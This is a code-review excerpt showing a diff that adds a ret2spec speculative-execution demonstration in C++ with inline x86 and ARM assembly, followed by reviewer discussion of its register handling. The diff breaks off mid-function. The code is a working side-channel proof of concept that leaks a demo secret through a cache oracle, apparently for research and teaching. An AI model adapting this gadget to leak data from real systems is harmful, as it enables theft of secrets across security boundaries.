demos/ret2spec.cc

```diff
@@ -0,0 +1,169 @@
+ * limitations under the License.
+ */
+
+#include <algorithm>
+#include <array>
+#include <cstring>
+#include <iostream>
+#include <string>
+#include <tuple>
+#include <vector>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+// TODO(asteinha) Implement support for MSVC and Windows.
+// TODO(asteinha) Investigate the exploitability of PowerPC.
+
+// Objective: given some control over accesses to the *non-secret* string
+// "Hello, world!", construct a program that obtains "It's a s3kr3t!!!" without
+// ever accessing it in the C++ execution model, using speculative execution
+// and side channel attacks
+const char *public_data = "Hello, world!";
+const char *private_data = "It's a s3kr3t!!!";
+extern char afterspeculation[];
+
+// Take the "afterspeculation" label address, push in on the stack, flush the
+// stack address and return.
+__attribute__((noinline))
+void escape() {
+  asm volatile(
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
+      "pushq %0\n"
+      "clflush (%%rsp)\n"
+      "mfence\n"
+      "lfence\n"
+      "ret\n"::"r"(afterspeculation));
+#elif defined(__aarch64__)
+      "adr x9, afterspeculation\n"
+      "str x9, [sp, #-16]!\n"
+      "mov x10, sp\n"
+      "dc civac, x10\n"
+      "dsb sy\n"
+      "ldr x30, [sp], #16\n"
+      "ret\n");
+#elif defined(__powerpc__)
+
+#else
+#  error Unsupported CPU.
+#endif
+}
+
+// Call the "escape" function which smashes the stack jumping back to the
+// "afterspeculation" label in the "leak_byte" function never executing the
+// code that follows the "escape" call in the "speculate" method.
+__attribute__((noinline))
+void speculation(const char *data, size_t offset,
+                 const std::array<BigByte, 256> &isolated_oracle) {
+  escape(); // Never returns
+
+  // Architecturally dead code. Never reached.
+  ForceRead(&isolated_oracle[static_cast<size_t>(data[offset])]);
+  std::cout << "If this is printed, it signifies a fatal error. "
+            << "This print statement is architecturally dead." << std::endl;
+}
+
+static char leak_byte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  // This is volatile along with other local variable that are not used in the
+  // "speculation" call so that we save registers and avoid spillage before the
+  // "speculation" call.
+  for (volatile int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    volatile size_t safe_offset = run % strlen(data);
+    ForceRead(&isolated_oracle[static_cast<size_t>(data[safe_offset])]);
+
+    // Backup all registers and mark the end of the context backup with the
+    // 0xfedcba9801234567 value.
```

Comment:
Can we find a better (less assembly) leak gadget than this? If not, we need to explain a *lot* more about our approach here and why we're using this.

Reply:
We can probably add another function call nesting that would take care for the backup and restore of most registers (dependent on the calling convention). The functions speculate could be without parameters are their current content can be passed in global variables. Mostly passing those arguments to the speculate function pollutes the content of registers. I'll look at it.

Reply:
x86 and x64 manage to work without explicit register backups. It's an ARM specific problem and I used always_inline functions for that.